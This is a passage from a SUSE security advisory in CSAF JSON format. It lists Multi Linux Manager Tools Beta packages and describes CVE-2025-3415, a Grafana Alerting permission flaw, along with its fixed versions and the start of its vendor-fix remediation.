"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x"
},
"product_reference": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64"
},
"product_reference": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-defusedxml-0.7.1-159000.4.2.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch"
},
"product_reference": "python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-mgr-push-5.2.3-159000.2.3.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch"
},
"product_reference": "python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-rhnlib-5.2.4-159000.4.3.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch"
},
"product_reference": "python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch"
},
"product_reference": "python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64"
},
"product_reference": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le"
},
"product_reference": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x"
},
"product_reference": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64"
},
"product_reference": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacecmd-5.2.6-159000.4.3.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch"
},
"product_reference": "spacecmd-5.2.6-159000.4.3.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-tools-5.2.4-159000.4.3.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch"
},
"product_reference": "spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch"
},
"product_reference": "supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch"
},
"product_reference": "supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64"
},
"product_reference": "venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le"
},
"product_reference": "venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x"
},
"product_reference": "venv-salt-minion-3006.0-159000.5.3.2.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
},
"product_reference": "venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64"
},
"product_reference": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le"
},
"product_reference": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x"
},
"product_reference": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64"
},
"product_reference": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dracut-saltboot-1.1.0-159000.2.2.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch"
},
"product_reference": "dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch"
},
"product_reference": "dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64"
},
"product_reference": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le"
},
"product_reference": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x"
},
"product_reference": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64"
},
"product_reference": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-5.2.5-159000.2.3.2.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64"
},
"product_reference": "mgrctl-5.2.5-159000.2.3.2.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-5.2.5-159000.2.3.2.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le"
},
"product_reference": "mgrctl-5.2.5-159000.2.3.2.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-5.2.5-159000.2.3.2.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x"
},
"product_reference": "mgrctl-5.2.5-159000.2.3.2.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-5.2.5-159000.2.3.2.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64"
},
"product_reference": "mgrctl-5.2.5-159000.2.3.2.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch"
},
"product_reference": "mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-lang-5.2.5-159000.2.3.2.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch"
},
"product_reference": "mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch"
},
"product_reference": "mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64"
},
"product_reference": "venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le"
},
"product_reference": "venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x"
},
"product_reference": "venv-salt-minion-3006.0-159000.5.3.2.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
},
"product_reference": "venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-3415",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-3415"
}
],
"notes": [
{
"category": "general",
"text": "Grafana is an open-source platform for monitoring and observability. The Grafana Alerting DingDing integration was not properly protected and could be exposed to users with Viewer permission. \nFixed in versions 10.4.19+security-01, 11.2.10+security-01, 11.3.7+security-01, 11.4.5+security-01, 11.5.5+security-01, 11.6.2+security-01 and 12.0.1+security-01",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-3415",
"url": "https://www.suse.com/security/cve/CVE-2025-3415"
},
{
"category": "external",
"summary": "SUSE Bug 1245302 for CVE-2025-3415",
"url": "https://bugzilla.suse.com/1245302"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
